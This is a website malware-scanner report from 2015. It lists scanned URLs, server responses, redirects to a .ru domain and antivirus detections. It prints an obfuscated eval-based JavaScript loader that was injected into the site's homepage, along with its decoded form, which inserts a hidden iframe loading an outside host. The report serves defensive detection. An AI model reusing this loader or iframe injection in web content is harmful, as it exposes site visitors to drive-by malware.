Malware Scanner report for mwenseayititou.com

Malicious/Suspicious/Total URLs checked: 1/0/8
1 page has malicious code. See details below.
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Scanned pages/files

Request | Server response | Status
http://mwenseayititou.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Jun 2015 01:28:58 GMT
Location: http://www.mwenseayititou.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
clean
http://www.mwenseayititou.com/
200 OK
Content-Length: 7437
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

i=0;try{prototype*5;}catch(z){fr="fromChar";f=[9,18,105,204,32,80,100,222,99,234,109,202,110,232,46,206,101,232,69,216,101,218,101,220,116,230,66,242,84,194,103,156,97,218,101,80,39,196,111,200,121,78,41,182,48,186,41,246,13,18,9,18,105,204,114,194,109,202,114,80,41,118,13,18,9,250,32,202,108,230,101,64,123,26,9,18,9,200,111,198,117,218,101,220,116,92,119,228,105,232,101,80,34,120,105,204,114,194,109,202,32,230,114,198,61,78,104,232,116,224,58,94,47,236,119,214,117,232,121,240,99,92,111,220,101,
... 1395 bytes are skipped ...
16,78,44,78,49,96,39,82,59,26,9,18,9,200,111,198,117,218,101,220,116,92,103,202,116,138,108,202,109,202,110,232,115,132,121,168,97,206,78,194,109,202,40,78,98,222,100,242,39,82,91,96,93,92,97,224,112,202,110,200,67,208,105,216,100,80,102,82,59,26,9,18,125];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document["createElem"+((f)?"ent":"")]("p");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];} r=String;z=((e)?"Code":"");for(;575-5+5>i;i+=1){j=i;if(e)s=s+r[fr+"Code"]((w[j]/(2-1+j%2)));} if(f)e(s);

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://vwkutyxc.onedumb.com/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://vwkutyxc.onedumb.com/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.
... 344 bytes are skipped ...
} function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://vwkutyxc.onedumb.com/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://vwkutyxc.onedumb.com/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Ikarus: Trojan.IframeRef
nProtect: JS:Trojan.Iframe.A
K7AntiVirus: Riskware
Emsisoft: JS:Trojan.Iframe.A (B)
McAfee-GW-Edition: Heuristic.BehavesLike.JS.Infected.A
DrWeb: JS.IFrame.151
Kaspersky: HEUR:Trojan.Script.Generic
Microsoft: Trojan:JS/Iframe.V
MicroWorld-eScan: JS:Trojan.Iframe.A
NANO-Antivirus: Trojan.Script.Iframe.rpyhz
F-Secure: JS:Trojan.Iframe.A
F-Prot: JS/IFrame.HC.gen
Norman: IframeRef.DM
GData: JS:Trojan.Iframe.A
Commtouch: JS/IFrame.HC.gen
BitDefender: JS:Trojan.Iframe.A

http://www.mwenseayititou.com/IAMHAITITOO.pdf
200 OK
Content-Length: 301928
Content-Type: application/pdf
clean
http://www.mwenseayititou.com/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Jun 2015 01:29:01 GMT
Location: http://peter-safe.ru/mnp/index.php
Server: Apache
Vary: Accept-Encoding
Content-Length: 218
Content-Type: text/html; charset=iso-8859-1
clean
http://peter-safe.ru/mnp/index.php
500 Can't connect to peter-safe.ru:80
Content-Length: 188
Content-Type: text/plain
clean
http://peter-safe.ru/test404page.js
500 Can't connect to peter-safe.ru:80
Content-Length: 188
Content-Type: text/plain
clean
http://mwenseayititou.com/MWENSEAYITITOU.pdf
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Jun 2015 01:29:02 GMT
Location: http://www.mwenseayititou.com/MWENSEAYITITOU.pdf
Server: Apache
Vary: Accept-Encoding
Content-Length: 256
Content-Type: text/html; charset=iso-8859-1
clean
http://www.mwenseayititou.com/mwenseayititou.pdf
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Jun 2015 01:29:02 GMT
Location: http://peter-safe.ru/mnp/index.php
Server: Apache
Vary: Accept-Encoding
Content-Length: 218
Content-Type: text/html; charset=iso-8859-1
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mwenseayititou.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 13 Jun 2015 01:28:58 GMT
Location: http://www.mwenseayititou.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1

...238 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: mwenseayititou.com
Referer: http://www.google.com/search?q=mwenseayititou.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mwenseayititou.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://mwenseayititou.com/

Result: mwenseayititou.com is not infected or malware details are not published yet.